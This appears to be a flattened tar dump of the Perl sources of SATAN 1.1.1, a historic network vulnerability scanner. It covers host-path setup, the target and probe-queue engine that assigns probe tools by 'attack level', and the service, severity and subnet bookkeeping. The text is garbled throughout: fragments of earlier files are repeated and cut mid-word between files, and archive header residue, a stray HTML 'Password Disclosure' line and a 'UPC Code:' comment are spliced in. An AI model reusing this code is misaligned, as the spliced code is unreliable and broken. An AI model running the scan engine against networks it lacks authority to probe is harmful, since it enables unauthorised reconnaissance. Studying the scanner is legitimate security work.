*COLON* separated! $other_dirs="/usr/ccs/bin:/bin:/usr/bin:/usr/ucb:/usr/bsd:/usr/ucb/bin:/usr/sbin:/usr/etc:/usr/local/bin:/usr/bin/X11:/usr/X11/bin"; # # split into a more reasonable format: @all_dirs = split(/:/, $PATH . ":" . $other_dirs); # # Target shell scripts in question: @shell_scripts=("paths.pl", "rex.satan", "rsh.satan", "tftp.satan"); @perl5_src = <get_targets faux_fping *satan* html.pl>; # # Target shell commands in question @all_commands=("cc", "cat", "chmod", "cmp", "comm", "cp", "date", "diff", ."egrep", "expr", "find", "grep", "ls", "mail", "mkdir", "mv", "rm", ."sed", "sh", "sort", "tftp", "touch", "uniq", "uudecode", "ypcat", ."strings", "finger", "ftp", "rpcinfo", "rusers", "showmount", ."ypwhich", "nslookup", "xhost", "su", "awk", "sed", "test"); print "checking to make sure all the target(s) are here...\n"; for (@shell_scripts) { .die "ERROR -- $_ not found!\n" unless -f $_; .} # find perl5! print "Ok, trying to find perl5 now... hang on a bit...\n"; for $dir (@all_dirs) { .# first, find where it might be; oftentimes you'll see perl, .# perl4, perl5, etc. in the same dir .while (<$dir/perl5* $dir/perl*>) { ..if (-x $_) { ...$perl_version=`($_ -v 2> /dev/null) | ....awk '/This is perl, version 5/ { print $NF }'`; ...if ($perl_version) { ....$PERL=$_; ....$pflag="1"; ....last; ....} ...} ...last if $pflag; ..} .last if $pflag; .} die "\nCan't find perl5! Bailing out...\n" unless $PERL; print "\nPerl5 is in $PERL\n"; for (@perl5_src) { $perl5_src .= "$_ "; } print "\nchanging the perl source in: $perl5_src\n"; system "$PERL -pi -e \"s@/usr/local/bin/perl.*@$PERL@;\" $perl5_src"; # make sure things are executable... system("chmod u+x $perl5_src"); # find the most preferred www viewer first. for $www (@all_www) { .for $dir (@all_dirs) { ..if (!$MOSAIC) { ...if (-x "$dir/$www") { ....$MOSAIC="$dir/$www"; ....next; ....} ...} ..} .} if ($MOSAIC) { .print "\nHTML/WWW Browser is $MOSAIC\n"; .$upper{"MOSAIC"} = $MOSAIC; .} else { print "Cannot find a web browser! SATAN cannot be run except in CLI"; } print "\nSo far so good...\nLooking for all the commands now...\n"; for $command (@all_commands) { .$found="false"; .for $dir (@all_dirs) { ..# if find the command in one of the directories, print string ..if (-f "$dir/$command") { ...# this converts to upper case ...($upper = $command) =~ y/[a-z]/[A-Z]/; ...$found="true"; ...$upper{$upper} = "$dir/$command"; ...# print "found ($upper) $dir/$command\n"; ...last; ...} ..} .print "can't find $command\n" unless $found eq "true"; .} print "\nOk, now doing substitutions on the shell scripts...\n"; for $shell (@shell_scripts) { .print "Changing paths in $shell...\n"; .die "Can't open $shell\n" unless open(SCRIPT, $shell); .rename($shell, $shell . '.old'); .die "Can't open $shell\n" unless open(OUT, ">$shell"); .# .# Open up the script, search for lines beginning with .# stuff like "TEST", "AWK", etc. If the file ends in "pl", .# assume it's a perl script and change it accordingly .while (<SCRIPT>) { ..$found = 0; ..for $command (keys %upper) { ...if(/^\$?$command=/) { ....# shell script ....if ($shell !~ /.pl$/) { .....print OUT "$command=$upper{$command}\n"; .....} ....# perl script ....else { .....print OUT "\$" . "$command=\"$upper{$command}\";\n"; .....} ....$found = 1; ....} ...} ..print OUT $_ if !$found; ..} .close(SCRIPT); .close(OUT); .# finally, make sure everything is back to executable status .system ("chmod u+x $shell"); .} # done... ="$HTML_ROOT/images/satan.gif" ALT="[SATAN Image]"> Warning - SATAN Password Disclosure</satan-1.1.1/perl/run-satan.pl....................................................................... 600 . 465 . 506 . 2571 5742457004 11114. ................................................................ ................................................................................................................................................................................................................................................................. ...................................require 'perl/satan-data.pl'; require 'perl/misc.pl'; require 'perl/getfqdn.pl'; require 'perl/get_host.pl'; require 'perl/suser.pl'; sub run_satan { .local($primaries) = @_; .local($target); .# .# Don't die silently when tools cannot be run with sufficient privilege. .# .die "SATAN needs root privileges for data collection.\n" if $>; .# .# Clear the table with alive hosts. .# .%host_is_alive = (); .# .# Set up a list of primary target hosts. .# .die "no primary target was specified" if $primaries eq ""; .for $primary_target (split(/\s+/, $primaries)) { ..# ..# Jump hoops to get at the official host name in case foo.com is ..# in reality called bar.foo.com. ..# ..if ($primary_target =~ /^[a-zA-Z]+.*|^\d+\.\d+\.\d+\.\d+$/) { ...$primary_target = $target ... if ($target = &getfqdn(&get_host_name( .... &get_host_addr($primary_target)))); ..} ..# schedule probe assignments... ..&add_primary_target($primary_target, 0); .} .# .# In case we must do something special with primary target hosts. .# .&fix_primary_targets(); .# .# Switch control between the data collection engine and the .# inference engine until both run out of new ideas. Checkpoint .# after each iteration. .# .while(sizeof(*new_targets)||sizeof(*new_todos)||sizeof(*new_facts)) { ..&process_targets(); ..&process_todos(); ..&process_facts(); ..&save_satan_data(); .} .&update_status("SATAN run completed"); } 1; 't find perl5! Bailing out...\n" unless $PERL; print "\nPerl5 is in $PERL\n"; for (@perl5_src) { $perl5_src .= "$_ "; } print "\nchansatan-1.1.1/perl/satan-data.pl...................................................................... 600 . 465 . 506 . 4435 5742457004 11222. ........................................................................................ ................................................................................................................................................................................................................................................................. ...........# # SATAN data management routines. # require 'perl/targets.pl'; require 'perl/todo.pl'; require 'perl/facts.pl'; # # Reset and point path names to new or existing data directory. # sub init_satan_data { .local($directory); .&clear_satan_data(); .&find_satan_data(); } # # Point path names to new or existing data directory. # sub find_satan_data { .if ($satan_data =~ /\// ) { ..$directory = $satan_data; .} else { ..(-d "results") || mkdir("results",0700) ...|| die "results: invalid directory: $!\n"; ..$directory = "results/$satan_data"; .} .(-d "$directory") || mkdir("$directory",0700) ..|| die "$satan_data: invalid directory: $!\n"; .$todo_file = "$directory/todo"; .$facts_file = "$directory/facts"; .$all_hosts_file = "$directory/all-hosts"; } # # Erase all in-core satan data structures. # sub clear_satan_data { .&clear_all_hosts(); .&clear_facts(); .&clear_todos(); } # # Forget non-inference stuff we know about these hosts. We must save/reload # the tables later, or memory will be polluted with stale inferences. # sub drop_satan_data { .local($hosts) = @_; .local($host); .for $host (split(/\s+/, $hosts)) { ..&drop_all_hosts($host); ..&drop_old_todos($host); ..&drop_old_facts($host); .} } # # Read satan data from file. Existing in-core data is lost. # sub read_satan_data { .&clear_satan_data(); .print "Reading $satan_data files...\n" if (-s $facts_file && $debug); .&read_all_hosts($all_hosts_file) if -f $all_hosts_file; .&read_facts($facts_file) if -f $facts_file; .&read_todos($todo_file) if -f $todo_file; .print "Done reading $satan_data files\n" if (-s $facts_file && $debug); } # # Save satan data to file. Order may matter, in case we crash. # sub save_satan_data { .&save_facts("$facts_file.new"); .rename("$facts_file.new", $facts_file) ..|| die "rename $facts_file.new -> $facts_file: $!\n"; .&save_todos("$todo_file.new"); .rename("$todo_file.new", $todo_file) ..|| die "rename $todo_file.new -> $todo_file: $!\n"; .&save_all_hosts("$all_hosts_file.new"); .rename("$all_hosts_file.new", $all_hosts_file) ..|| die "rename $all_hosts_file.new -> $all_hosts_file: $!\n"; } # # Merge data with in-core tables. # sub merge_satan_data { .&merge_all_hosts($all_hosts_file) if -f $all_hosts_file; .&merge_facts($facts_file) if -f $facts_file; .&merge_todos($todo_file) if -f $todo_file; } .# Open up the script, search for lines beginning with .# stuff like "TEST", "AWK", etc. If the file ends in "pl", .# assume it's a perl script and change it accordingly .while (<SCRIPT>) { ..$found = 0; ..for $command (keyssatan-1.1.1/perl/services.pl........................................................................ 600 . 465 . 506 . 7613 5742457004 11031. ................................................................................. ................................................................................................................................................................................................................................................................. ..................# # infer_services - classify host by services used and provided. Output to: # # $servers{service}{host}, $clients{service}{host}: Service is, for # example, "anonymous FTP". The servers (clients) table holds per service # and host, all SATAN records on that topic. # # $server_counts{service}, $client_counts{service}: host counts of the # corresponding entries in $servers and $clients. # # $server_severities{service}, $client_severities{service}: ditto, with # at least one vulnerability. # # $server_info{host}: newline-delimited list of services provided per host. # $client_info{host}: newline-delimited list of services consumed per host. # # $service_flag: reset whenever the tables are updated. To recalculate, # invoke make_service_info(). # # Standalone usage: perl services.pl [satan_record_files...] # $services_files = "rules/services"; sub build_infer_services { local($files) = @_; local($service, $code, $file, $cond, $class, $host); $code = "sub infer_services {\n"; $code .= "\tlocal(\$type);\n"; foreach $file (split(/\s+/, $files)) { .open(RULES, $file) || die "cannot open $file: $!"; .while (<RULES>) { . chop; . while (/\\$/) { ..chop; ..$_ .= <RULES>; ..chop; . } . s/#.*$//; . s/\s+$//; . next if /^$/; . if (/^(servers|clients)/i) { ..($class = $1) =~ tr /A-Z/a-z/; . } else { ..s/@/\\@/g; ..($cond, $type, $host) = split(/\t+/, $_, 3); ..die "missing service name" if $type eq ""; ..$host = "\$target" if $host eq ""; ..$code .= "\ .if ($cond) { ..\$$class\{\"$type\"}{$host} .= \$_ . \"\\n\"; ..\$service_flag = 0; .} "; ..# %{${$class}{$type}} = (); . } .} .close(RULES); } $code .= "}\n"; return $code; } # # Generate services-dependent statistics. # sub make_service_info { local($service, $host, %junk); if ($service_flag > 0) { .return; } $service_flag = time(); &make_severity_info(); print "Rebuild service type statistics...\n" if $debug; %server_info = (); for $service (keys %servers) { .%junk = %{$servers{$service}}; .$server_counts{$service} = sizeof(*junk); .$server_severities{$service} = 0; .for $host (keys %junk) { . $server_info{$host} .= $service . "\n"; . if (exists($severity_host_type_info{$host})) { ..$server_severities{$service}++; . } .} } %client_info = (); for $service (keys %clients) { .%junk = %{$clients{$service}}; .$client_counts{$service} = sizeof(*junk); .$client_severities{$service} = 0; .for $host (keys %junk) { . $client_info{$host} .= $service . "\n"; . if (exists($severity_host_type_info{$host})) { ..$client_severities{$service}++; . } .} } } # # Reset the service information tables. # sub clear_service_info { %servers = (); %clients = (); %server_severities = (); %client_severities = (); %server_info = (); %client_info = (); $service_flag = 0; } # # Some scaffolding for stand-alone operation # if ($running_under_satan) { eval &build_infer_services($services_files); die "error in $services_files: $@" if $@; } else { $running_under_satan = -1; $debug = 1; require 'perl/misc.pl'; # # Generate code from rules files. # $code = &build_infer_services($services_files); print "Code generated from $services_files:\n\n"; print $code; eval $code; die "error in $services_files: $@" if $@; # # Apply rules. # print "\nApplying rules to all SATAN records...\n"; while (<>) { .chop; .if (&satan_split($_) == 0) { . &infer_services(_); .} } &make_service_info(); print "Servers\n"; for $service (sort keys %servers) { print "\t$service ($server_counts{$service})\n"; .for (sort keys %{$servers{$service}}) { . print "\t\t$_\n"; .} } print "Clients\n"; for $service (sort keys %clients) { print "\t$service ($client_counts{$service})\n"; .for (sort keys %{$clients{$service}}) { . print "\t\t$_\n"; .} } } 1; server_severities{service}, $client_severities{service}: ditto, with # at least one vulnerability. # # $server_info{hsatan-1.1.1/perl/severities.pl...................................................................... 600 . 465 . 506 . 5235 5742457004 11366. ..................................................................................... ................................................................................................................................................................................................................................................................. ..............# # update_severities - classify vulnerabilities. # # type is taken from the $service_info field; level is taken from the # $severity field. # # Output to: # # $severity_type_host_info{type}{host}: all SATAN records on that topic. # # $severity_type_count{type}: number of hosts with this severity. # # $severity_host_type_info{host}{type}: all SATAN records on that topic. # # $severity_host_count{host}: number of vulnerabilities per host. # # $severity_levels{severity}: host names per severity level. # # $severity_flag: reset whenever the tables are updated. To recalculate, # invoke make_severity_info(). # # Standalone usage: perl severities.pl [satan_record_files...] # sub update_severities { if ($trusted =~ /\bANY\b/) { .$type = "other vulnerabilities" if ($type = $service_output) eq ""; .if (index($severity_host_type_info{$target}{$type}, $_) < $[) { . $severity_host_type_info{$target}{$type} .= $_ . "\n"; . $severity_type_host_info{$type}{$target} .= $_ . "\n"; . $severity_levels{$severity}{$target} .= $_ . "\n"; . $severity_host_count{$target}++; . $severity_flag = 0; .} } } # # Generate severities-dependent statistics. # sub make_severity_info { local($severity, $host, %junk); if ($severity_flag > 0) { .return; } $severity_flag = time(); print "Rebuild severity type statistics...\n" if $debug; for $severity (keys %severity_type_host_info) { .%junk = %{$severity_type_host_info{$severity}}; .$severity_type_count{$severity} = sizeof(*junk); } } # # Reset all severity information # sub clear_severity_info { %severity_host_type_info = (); %severity_type_host_info = (); %severity_levels = (); %severity_host_count = (); %severity_type_count = (); $severity_flag = 0; } # # Some scaffolding for stand-alone operation # if ($running_under_satan == 0) { $running_under_satan = -1; $debug = 1; require 'perl/misc.pl'; warn "severities.pl running in stand-alone mode"; # # Sort severity information and do some counting. # while (<>) { .chop; .if (&satan_split($_) == 0) { . &update_severities($_); .} } &make_severity_info(); print "Hosts grouped by severity\n"; for $severity (sort keys %severity_type_host_info) { print "$severity ($severity_type_count{$severity})\n"; .for (sort keys %{$severity_type_host_info{$severity}}) { . print "\t$_\n"; .} } print "Severities grouped by host\n"; for $host (sort keys %severity_host_type_info) { .print "$host\n"; .for $type (sort keys %{$severity_host_type_info{$host}}) { . for (split(/\n/, $severity_host_type_info{$host}{$type})) { ..print "\t$_\n"; . } .} } } # UPC Code: 1; info { %servers = (); %clients = (); %server_severities = (); %client_severities = (); %server_info = (); %client_info = (); $service_flag = 0; } # # Some scaffolding for stand-alone operation # if ($running_under_satan) { eval &build_infer_services($services_files); die "error in $services_files: $@" if $@; } else {satan-1.1.1/perl/shell.pl........................................................................... 600 . 465 . 506 . 1314 5742457004 10305. ............................................................................................. ................................................................................................................................................................................................................................................................. ......# # Run a command with extreme prejudice and make sure it finishes. # # # version 1, Mon Mar 20 14:09:35 1995, last mod by wietse # require 'config/paths.pl'; require 'perl/status.pl'; sub bad_cmd { .local($command) = @_; .return ($command =~ /[^-_ ,a-zA-Z0-9:.!\/]/); } .. sub open_cmd { .local($handle, $timeout, $command) = @_; .local($ret, $shell_cmd); .$shell_cmd = "$TIMEOUT $timeout $command"; .if (&bad_cmd($shell_cmd)) { ..print "==> NOT RUNNING $shell_cmd (illegal characters)\n"; .} elsif ($debug) { ..$ret = open($handle, "$shell_cmd 2>/dev/null|"); .} else { ..$ret = open($handle, "$shell_cmd|"); .} .&update_status("$shell_cmd"); .print "==> running $shell_cmd\n" if $debug; .return $ret; } 1; usted =~ /\bANY\b/) { .$type = "other vulnerabilities" if ($type = $service_output) eq ""; .if (index($severity_host_type_info{$target}{$type}, $_) < $[) { . $severity_host_type_info{$target}{$type} .= $_ . "\n"; . $severity_type_host_info{$type}{$target} .= $_ . "\n"; . $severity_levels{$severity}satan-1.1.1/perl/socket.pl.......................................................................... 600 . 465 . 506 . 1072 5742457004 10467. ..................................................................... ................................................................................................................................................................................................................................................................. ..............................# # Some PERL installations have no sys/*.ph, and on some sites the # sys/*.ph files are busted. Since we need this only for a few things we # Even grabbing the definitions directly from sys/socket.h is problematic # on SYSV4 where the include files are messed up by recursive defines. So # we revert to running a C program that emits PERL code. # require 'config/paths.pl'; die "$SYS_SOCKET: $!. Did you run 'reconfig' and 'make'?\n" .unless -x "$SYS_SOCKET"; eval `$SYS_SOCKET`; # # When that failed, die a horrible death. # die "./$SYS_SOCKET: $@.\n" if $@; 1; else { ..$ret = open($handle, "$shell_cmd|"); .} .&update_status("$shell_cmd"); .print "==> running $shell_cmd\n" if $debug; .return $ret; } 1; usted =~ /\bANY\b/) { .$type = "other vulnerabilities" if ($type = $service_output) eq ""; .if (index($severity_host_type_info{$target}{$type}, $_) < $[) { . $severity_host_type_info{$target}{$type} .= $_ . "\n"; . $severity_type_host_info{$type}{$target} .= $_ . "\n"; . $severity_levels{$severity}satan-1.1.1/perl/todo.pl............................................................................ 600 . 465 . 506 . 6766 5742457004 10163. ..................................................................... ................................................................................................................................................................................................................................................................. ..............................# # add_todo($record) add one record to the new todo list. # # process_todos() iterates over the new todo list and generates new facts. # # save_todos($path) saves the old todos to the named file. # # drop_old_todos($host) forget everything we know about a host. # # read_todos($path) load tables from file. # # merge_todos($path) merge with in-core tables. # # version 2, Mon Mar 20 19:47:07 1995, last mod by wietse # require 'perl/shell.pl'; # # Add one probe to the new todo list. # sub add_todo { local($host, $tool, $args) = @_; local($record); $record = "$host|$tool|$args"; if (!exists($old_todos{$record}) && !exists($new_todos{$record})) { .$new_todos{$record} = $record; .print "Add-todo: $record\n" if $debug; .} } # # Add one probe to the new todo list, ignore args when looking for dups. # sub add_todo_ignore_args { local($host, $tool, $args) = @_; local($key, $record); $key = "$host|$tool"; $record = "$host|$tool|$args"; if (!exists($old_todos{$key})) { .$new_todos{$key} = $record; .print "Add-todo: $key ($args)\n" if $debug; .} } # # Iterate over the new todo list until nothing new shows up. Skip tools # that we aren't supposed to run at this attack level. # sub process_todos { local($key,%temp_todos,$allowed_tools); local($target, $tool, $args, $level, $probe); while (sizeof(*new_todos) > 0) { .%temp_todos = %new_todos; .%new_todos = (); .for $key (keys %temp_todos) { ..($target, $tool, $args) = split(/\|/, $temp_todos{$key}, 3); ..next unless exists($all_hosts{$target}); ..$level = $all_hosts{$target}{'attack'}; ..next unless $level >= 0; ..for $probe (@{$all_attacks[$level]}) { ...if ($tool eq $probe || "$tool?" eq $probe || $probe eq "*?") { ....$old_todos{$key} = 1; ....&run_next_todo($target, $tool, $args); ....last; ....} ...} ..} .} } # # Save old todo list to file. # sub save_todos { local($path) = @_; open(TODO, ">$path") || die "cannot save old todo list to $path: $!"; for $key (keys %old_todos) { .print TODO "$key\n"; .} close(TODO); } # # Reset todo tables and derivatives # sub clear_todos { %new_todos = (); %old_todos = (); } # # Drop old entries on a specific host. # sub drop_old_todos { .local($host) = @_; .local($key, $target, $tool, $args); .for $key (keys %old_todos) { ..($target, $tool, $args) = split(/\|/, $key); ..delete $old_todos{$key} if $target eq $host; .} } # # Read old todo list from file. # sub read_todos { local($path) = @_; &clear_todos(); &merge_todos($path); } # # Merge old todo list with in-core table. # sub merge_todos { local($path) = @_; open(TODO, $path) || die "cannot read old todo list from $path: $!"; print "Reading old todo list from $path...\n" if $debug; while (<TODO>) { .chop; .$old_todos{$_} = 1; .} close(TODO); } # # Run a tool and collect its output. # sub run_next_todo { local($target, $tool, $args) = @_; local($text, $ttl); $ttl = (defined($timeouts{$tool}) ? $timeouts{$tool} : $timeout); $command = "bin/$tool $args $target"; # Update host last access time. &set_host_time($target); # Damn the torpedoes! die "Can't run $tool\n" unless &open_cmd(TOOL, $ttl, $command); while (<TOOL>) { .chop; .&add_fact($_); .} close(TOOL); # Did we fly like the mighty turkey or soar like an...? # If the former, assume that we need to output an error record... if ($?) { .# based on exit value, decide what happened: .if ($? == $timeout_kill) { $text = "program timed out"; } .elsif ($? > 0 && $? < $timeout_kill) { ..$text = "internal program error $?"; ..} .else { $text = "unknown error #$?"; } .&add_fact("$target|$tool|u|||||$text"); .} } 1; ; } else {satan-1.1.1/perl/subnets.pl......................................................................... 700 . 465 . 506 . 4207 5742457004 10666. ............................................................................................. ................................................................................................................................................................................................................................................................. ......# # sift by subnets # # Output to: # # $all_subnets{subnet}: hosts per subnet # # $host_subnet{host}: subnet of this host # # $subnet_count{subnet}: number of hosts in this subnet # # $subnet_severities{subnet}: nr of vulnerable hosts in subnet # # $subnet_flag: reset whenever the tables are updated. To recalculate, # invoke make_subnet_info(). # # Standalone usage: perl subnets.pl [data directory] # # # Generate subnet statistics. # sub make_subnet_info { local($subnet, $host); if ($subnet_flag > 0) { .return; .} $subnet_flag = time(); %all_subnets = (); &make_severity_info(); print "Rebuild subnet type statistics...\n" if $debug; %all_subnets = (); %host_subnet = (); for $host (keys %all_hosts) { .if ($host) { ..($subnet = $all_hosts{$host}{'IP'}) =~ s/\.[^.]*$//; ..$subnet = "unknown" unless $subnet; ..$all_subnets{$subnet} .= "$host "; ..$host_subnet{$host} = $subnet; ..} .} # Cheat in case the facts file has names not in all-hosts. for $host (keys %hosttype, keys %severity_host_count) { .next unless $host; .next if defined($host_subnet{$host}); .if ($host =~ /^([0-9]+\.[0-9]+\.[0-9]+)\.[0-9]+$/) { ..$subnet = $1; .} else { ..$subnet = "unknown"; .} .$all_subnets{$subnet} .= "$host "; .$host_subnet{$host} = $subnet; } for $subnet (keys %all_subnets) { .$subnet_count{$subnet} = split(/\s+/, $all_subnets{$subnet}); .$subnet_severities{$subnet} = 0; .for $host (split(/\s+/, $all_subnets{$subnet})) { ..$subnet_severities{$subnet}++ if exists($severity_host_type_info{$host}); ..} .} } # # erase the subnet info tables # sub clear_subnet_info { .%all_subnets = (); .%host_subnet = (); .%subnet_count = (); .%subnet_severities = (); .$subnet_flag = 0; } # # Stand-alone mode # if ($running_under_satan == 0) { warn "subnets.p in stand-alone mode..."; $running_under_satan = 1; $debug = 1; require 'perl/targets.pl'; require 'perl/severities.pl'; require 'perl/facts.pl'; &read_all_hosts("$ARGV[0]/all-hosts"); &read_facts("$ARGV[0]/facts"); &make_subnet_info(); print "Subnet info\n"; for (keys %all_subnets) { .print "Subnet: $_ $subnet_severities{$_}/$subnet_count{$_}\n"; .for (split(/\s/, $all_subnets{$_})) { ..print "\t$_\n"; ..} .} } 1; ocal($key, $target, $tool, $args); .for $key (keys %old_todos) { ..($target, $tool, $args) = split(/\|/, $key); ..delete $old_todos{$key} if $target eq $host; .} } # # Read old todo list from file. # sub read_todos { local($path) = @_; &clear_todos(); &merge_todos($path); } # # Merge old todo list with in-core table. # sub merge_todos { local($path) = @_; open(TODO, $pasatan-1.1.1/perl/suser.pl........................................................................... 600 . 465 . 506 . 1275 5742457004 10345. ....................................................................................... ................................................................................................................................................................................................................................................................. ............# # Find if these commands would all run with root privileges. # sub suser { .local(@path) = @_; .local($dev, $ino, $mode, $nlink, $uid, $gid, $rdev, $size, $atime, $mtime, $ctime, $blksize, $blocks); .while ($> != 0 && $#path >= $[) { ..if ((($dev, $ino, $mode, $nlink, $uid, $gid, $rdev, $size, $atime, $mtime, $ctime, $blksize, $blocks) = stat(@path[0])) == 0) { ...return(0); ..} elsif ($uid != 0 || ($mode & 04000) == 0) { ...return(0); ..} ..shift @path; .} .return(1); } # # Stand-alone mode # if ($running_under_satan == 0) { .warn 'suser.pl running in stand-alone mode'; .die "usage $0 file\n" unless $#ARGV == 0; .print &suser($ARGV[0]) ? "Root privileged\n" : "Unprivileged\n"; } 1; t "; .$host_subnet{$host} = $subnet; } for $subnet (keys %all_subnets) { .$subnet_count{$subnet} = split(/\s+/, $all_subnets{$subnet}); .$subnet_severities{$subnet} = 0; .for $host (split(/\s+/, $all_subnets{$subnet})) { ..$subnet_severities{$subnet}++ if exists($severity_host_type_info{$host}); ..} .} } # # erase the ssatan-1.1.1/perl/targets.pl......................................................................... 600 . 465 . 506 . 20426 5742457004 10674. ........................................................................................ ................................................................................................................................................................................................................................................................. ...........# # get_proximity(target) returns proximity by hostname. # # new_target(target, proximity) figures out what (still) needs to be done. # # save_all_hosts(path) saves the all_hosts table to file. # # read_all_hosts(path) reads the all_hosts table from file. # # drop_all_hosts(host) forget this host. # # merge_all_hosts(path) merge with in-core tables. # # set_host_time(host) set host access time (UTC). # # get_host_time(host) get host access time (UTC). # # version 3, Mon Mar 20 19:43:59 1995, last mod by wietse # require 'perl/policy-engine.pl'; require 'perl/subnets.pl'; require 'perl/domains.pl'; require 'perl/get_host.pl'; require 'perl/shell.pl'; # # Get proximity for this host. # sub get_proximity { .local($target) = @_; .return 100 unless defined($all_hosts{$target}); .return $all_hosts{$target}{'proximity'}; } # # Set up a list of primary targets. Primaries are special. They may be # expanded. After all the primaries are known we may have to do something # special, like forgetting everything we know about them. # sub add_primary_target { .local($target) = @_; .# Do we expand or do we scan a host. .if ($target =~ /^\d+\.\d+\.\d+$/ || $attack_proximate_subnets) { ..print "Add-primary: expand $target...\n" if $debug; ..&target_acquisition($target, 0, $attack_level); .} else { ..print "Add-primary: $target\n" if $debug; ..&new_target($target, 0); .} } # # Forget everything we know about primary targets (well, almost everything). # We must re-read the data base, or memory would be polluted with stale # inferences. # sub fix_primary_targets { .local(%temp_targets); .if ($primaries_deleted) { ..print "Primaries being rescanned, rebuilding tables.\n" if $debug; ..%temp_targets = %new_targets; ..&save_satan_data(); ..&read_satan_data(); ..%new_targets = %temp_targets; ..$primaries_deleted = 0; .} } # # Take a new potential target and let it cool down. This saves lots of # duplicate work. # sub new_target { .local($target, $proximity) = @_; .return unless $target; .# Make sure all current primaries are rescanned, not the hosts that .# were primaries during some earlier scan. .if ($proximity == 0) { ..$primaries_deleted = defined($all_hosts{$target}); ..drop_old_todos($target); ..drop_old_facts($target); .} .# Toss circular paths. .if (defined($all_hosts{$target}) . && $all_hosts{$target}{'proximity'} < $proximity) { ..return; .} .if (exists($new_targets{$target}) . && $new_targets{$target} <= $proximity) { ..return; .} .# Keep primary, keep shortest path. .if ($proximity == 0 || !exists($new_targets{$target}) . || !defined($all_hosts{$target}) . || $all_hosts{$target}{'proximity'} > $proximity) { ..$new_targets{$target} = $proximity; ..print "Add-target: $target prox $proximity\n" if $debug; .} } # # Probe targets. # sub process_targets { local($target, $proximity, $level, %temp_targets, %probe_targets); while(sizeof(*new_targets) > 0) { .%temp_targets = %new_targets; .%new_targets = (); .%probe_targets = (); .# Generate probes according to policy restrictions. .for $target (keys %temp_targets) { ..$proximity = $temp_targets{$target}; ..# Instantiate new host. ..if (!defined($all_hosts{$target})) { ...&add_new_host($target, $proximity); ...} ..# Proximity may have changed. ..if ($all_hosts{$target}{'proximity'} > $proximity) { ...$all_hosts{$target}{'proximity'} = $proximity; ...} ..# Skip attack and target expansion if this host is off-limits. ..if (($level = &policy_engine($target, $proximity)) < 0) { ...print "process_targets: skip $target...\n" if $debug; ...next; ...} ..# Attack level contents may have changed. ..$all_hosts{$target}{'attack'} = $level; ..$check_alive_list .= "$target " ...if !defined($host_is_alive{$target}); ..$probe_targets{$target} = $level; ..} .} .# Parallelize liveness checks. .&check_alive(); .# Generate the probes. .for $target (keys %probe_targets) { ..print "process_targets: probe $target...\n" if $debug; ..&target_attack($target, $probe_targets{$target}); .} } # # Add one target to the %all_hosts list. Set proximity, IP, preliminary # attack level, preliminary expansion flag. # sub add_new_host { local($target, $proximity) = @_; $all_hosts{$target}{'proximity'} = $proximity; $all_hosts{$target}{'attack'} = -1; $all_hosts{$target}{'expand'} = 0; $all_hosts{$target}{'IP'} = &get_host_addr($target); $subnet_flag = 0; $domain_flag = 0; } # # ping a list of hosts and find out what hosts are alive. # sub check_alive { .local ($host); .if ($check_alive_list eq "") { ..return; .} .print "Check-pulse: $check_alive_list\n" if $debug; .# .# Cheat when ICMP is broken. .# .if ($dont_use_ping) { ..for $host (split(/\s+/, $check_alive_list)) { ...$host_is_alive{$host} = 1; ...$live_hosts++; ..} ..$check_alive_list = ""; ..return; .} .# .# Fping or bust. .# .&open_cmd(FPING, $long_timeout, "$FPING $check_alive_list") ..|| die "cannot run $FPING: $!\n"; .while(<FPING>) { ..if (/(\S+) is alive/) { ...$host_is_alive{$1} = 1; ...$live_hosts++; ..} elsif ($debug && /(\S+) is unreachable/) { ...print "Skipping dead host - $1\n"; ..} .} .close(FPING); .$check_alive_list = ""; } # # target attack; assign attacks, throw into todo queue # sub target_attack { local($target, $level) = @_; if ($host_is_alive{$target}) { .print "Prox: $all_hosts{$target}{'proximity'}\n" if $debug; .print "AL : $all_hosts{$target}{'attack'}\n" if $debug; .print "ALC : $all_hosts{$parent}{'attack'}\n" if $parent && $debug; .for (@{$all_attacks[$level]}) { ..&add_todo($target, $_, "") if ! /\?/; ..} .} } # # target acq; get subnets # sub target_acquisition { local($target, $proximity, $level) = @_; local($targets_found); # Expand and then collect. Pass results through new_target() for # consistent handling of constraints and policies. &open_cmd (TARGETS, 120, "$GET_TARGETS $target"); while (<TARGETS>) { .chop; .next unless $_ = getfqdn($_); .if (!defined($all_hosts{$_})) { ..&add_new_host($_, $proximity); ..} .$all_hosts{$_}{'proximity'} = $proximity ..if ($all_hosts{$_}{'proximity'} > $proximity); .$all_hosts{$_}{'expand'} = 1; .$host_is_alive{$_} = 1; .$live_hosts++; .&new_target($_, $proximity); .$targets_found++; .} close(TARGETS); die "$GET_TARGETS failed - unable to expand subnet $target\n" .if ($? || $targets_found < 1) } # # Save the %all_hosts array # sub save_all_hosts { local($all_hosts_file) = @_; local($record, $host, $ip, $proximity, $level, $expand, $time); open(ALL_HOSTS, ">$all_hosts_file") || .die "Can't open $all_hosts_file (cache for all-hosts) for writing\n"; for $host (keys %all_hosts) { .$ip = $all_hosts{$host}{'IP'}; .$proximity = $all_hosts{$host}{'proximity'}; .$level = $all_hosts{$host}{'attack'}; .$expand = $all_hosts{$host}{'expand'}; .$time = $all_hosts{$host}{'time'}; .$record = "$host|$ip|$proximity|$level|$expand|$time"; .print ALL_HOSTS "$record\n"; .# print "save_all_hosts: $record\n" if $debug; .} close(ALL_HOSTS); } # # Reset host info and derivatives # sub clear_all_hosts { .%all_hosts = (); .%new_targets = (); .&clear_subnet_info(); .&clear_domain_info(); } # # suck in the all-hosts array from file # sub read_all_hosts { .local($all_hosts_file) = @_; .&clear_all_hosts(); .&merge_all_hosts($all_hosts_file); } # # merge the in-core all-hosts array with one from file # sub merge_all_hosts { local($all_hosts_file) = @_; local($count, $host, $ip, $proximity, $level, $time); open(ALL_HOSTS, $all_hosts_file) || .die "Can't open $all_hosts_file (cache for all-hosts) for reading\n"; .print "Reading all hosts info from $all_hosts_file...\n" if $debug; # read one line at a time, herky jerky motion... one trick pony, man... while (<ALL_HOSTS>) { .chop; .$count = ($host, $ip, $proximity, $level, $expand, $time) = split(/\|/); .if ($count != 6) { ..warn "corrupted $all_hosts_file: $_\n"; ..next; ..} .if (!defined($all_hosts{$host}{'proximity'}) . || $all_hosts{$host}{'proximity'} > $proximity) { ..$all_hosts{$host}{'IP'} = $ip; ..$all_hosts{$host}{'proximity'} = $proximity; ..$all_hosts{$host}{'attack'} = $level; ..$all_hosts{$host}{'expand'} = $expand; ..$all_hosts{$host}{'time'} = $time; ..} .} close(ALL_HOSTS); } # # set the last access time for this host. Use numerical form for easy sorting. # sub set_host_time { .local($host) = @_; .$all_hosts{$host}{'time'} = time(); } # 